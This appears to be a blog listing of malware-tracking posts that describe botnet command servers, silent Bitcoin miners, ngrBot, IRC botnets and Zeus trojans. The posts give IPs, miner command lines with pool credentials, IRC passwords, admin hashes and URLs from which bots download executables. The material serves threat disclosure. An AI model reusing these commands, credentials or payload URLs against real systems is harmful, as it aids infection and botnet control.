Author: Pig

b.mobinil.biz(Silent BitCoin GPU Miner using Phoenix Miner)

Uncategorized

http://b.mobinil.biz:8332/ cgminer.exe -o http://b.mobinil.biz:8332/ -u redem_g -p redemxxxxxxx -I 6 mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2 mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2 Resolved : [ b.mobinil.biz ] To [ 46.4.123.12 ] Resolved : [ b.mobinil.biz ] To [ 108.60.208.157 ] ResolvedRead more...

115.239.230.68(ngrBot hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Uncategorized

Remote Host Port Number 115.239.230.68 5101 PASS hax0r 203.17.62.187 80 213.251.170.52 80 31.184.237.82 80 64.111.199.221 80 66.45.56.124 80 67.225.165.214 80 70.38.98.236 80 70.38.98.239 80 PASS hax0r..KCIK n{US|XPa}ncfvgh k..RSSR ncfvghk 0 0 :ncfvghk..SE ND #ngme ng00.. PRIVMSG #ngme :[d=”http://31.184.237.82/ms02.exe” s=”100352 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0 PRIVMSG #ngme :[d=”http://31.184.237.82/ppbnt.exe” s=”61440 bytes”]Read more...

77.235.47.132(ngrBot hosted in Netherlands Amsterdam Eurovps)

Uncategorized

Remote Host Port Number 195.122.131.12 80 213.251.170.52 80 77.235.47.132 4042 PASS ngrBot PRIVMSG #boss :[d=”http://rapidshare.com/files/4007909942/shedontlikemeshelikemycar.exe”] Error downloading file [e=”12039″] NICK n{US|XPa}psbuhdn USER psbuhdn 0 0 :psbuhdn JOIN #boss ngrBot PRIVMSG #boss :[MSN]: Updated MSN spread interval to “3” PRIVMSG #boss :[MSN]: Updated MSN spread message to “haha! http://goo.gl/LVZjX?img=facebook_photoalbum_24_07_2011_jpeg” The data identified by the following URLsRead more...

irc.swag.net(around 1.5k bots hosted in Germany Netdirect)

Uncategorized

server: 178.162.234.177:6667 channel: #nix heckers inside the botnet: var $admins = array ( ‘LiGHTzz’ => ‘e48e13207341b6bffb7fb1622282247b’, ‘cmd’ => ‘e48e13207341b6bffb7fb1622282247b’, ‘broken’ => ‘e48e13207341b6bffb7fb1622282247b’, Operators : 10 operator(s) online Channels : 14 channels formed Clients : I have 131 clients and 1 servers Local users : Current Local Users: 131 Max: 1574 Global users : Current GlobalRead more...

50.31.0.109(1k linux bots hosted in United States Chicago Steadfast Networks)

Uncategorized

var $config = array(“server”=>”50.31.0.109”, “port”=>”8080”, “pass”=>””, “prefix”=>”tibia|”, “maxrand”=>”4”, “chan”=>”#tibia2”, “chan2″=>”#tibia”, “key”=>”puto”, “modes”=>”+p”, “password”=>”lol321”, “trigger”=>”.”, “hostauth”=>”*” // Invisible Users : 2 Channels : 1 channels formed Clients : I have 148 clients and 0 servers Local users : Current local users: 148 Max: 1000 Global users : Current global users: 148 Max: 1000 hosting infos: http://whois.domaintools.com/50.31.0.109

ks3096360.kimsufi.com(zeus banking trojans hosted in France Ovh Systems)

Uncategorized

ks3096360.kimsufi.com DNS_TYPE_A 94.23.232.121 Port Type 24477 tcp – HTTP Conversations: 94.23.232.121:80 – [ks3096360.kimsufi.com] Request: GET /Zeus/config.bin Response: 200 “OK” 74.125.224.146:80 – [www.google.com] Request: GET /webhp Response: 200 “OK” 94.23.232.121:80 – [ks3096360.kimsufi.com] Request: POST /Zeus/gate.php Response: 200 “OK” Request: POST /Zeus/gate.php Response: 200 “OK” EXE FILE: http://ks3096360.kimsufi.com/Zeus/bot.exe hosting infos: http://whois.domaintools.com/94.23.232.121

kjrub.com(zeus banking trojan hosted in United States Hostdime.com Inc)

Uncategorized

isreali hecker using zeus botnet and rat kjrub.no-ip.org 46.120.170.54 this is home ip for sure Outgoing connection to remote server: kjrub.no-ip.org TCP port 101 Outgoing connection to remote server: kjrub.no-ip.org TCP port 99 Outgoing connection to remote server: kjrub.no-ip.org TCP port 1604 kjrub.com kjrub.com 64.37.52.109 Opened listening TCP connection on port: 39698 Download URLs http://64.37.52.109/Zeus/config.binRead more...

itconsorcium.me(zeus banking trojan hosted in Netherlands Amsterdam Leaseweb B.v)

Uncategorized

itconsorcium.me itconsorcium.me 85.17.65.10 Opened listening TCP connection on port: 39231Download URLs http://85.17.65.10/system-updates/config.bin (itconsorcium.me) http://85.17.65.10/system-updates/config.bin (itconsorcium.me) http://kenney.cz.cc/system-updates/bot.exe Outgoing connection to remote server: itconsorcium.me TCP port 80 Outgoing connection to remote server: itconsorcium.me TCP port 80 hosting infos: http://whois.domaintools.com/85.17.65.10

205.134.246.98(irc botnet hosted in United States Arlington Gamedata Inc)

Uncategorized

Remote Host Port Number 205.134.246.98 9090 PASS prison 216.146.38.70 80 72.233.89.200 80 PRIVMSG {00-USA-XP-COMP-` =~@ :HTTP SET http://68.173.251.107/x.exe =~@ :SC// Sequential Port Scan started on 174.133.89.0:445 with a delay of 10 seconds for 0 minutes using 100 threads. PONG leaf.18632.com NICK {iNF-00-USA-XP-COMP-4138} USER MEAT * 0 :COMP JOIN ##hxxp## NICK {00-USA-XP-COMP-3086} JOIN ###meat hosting infos:Read more...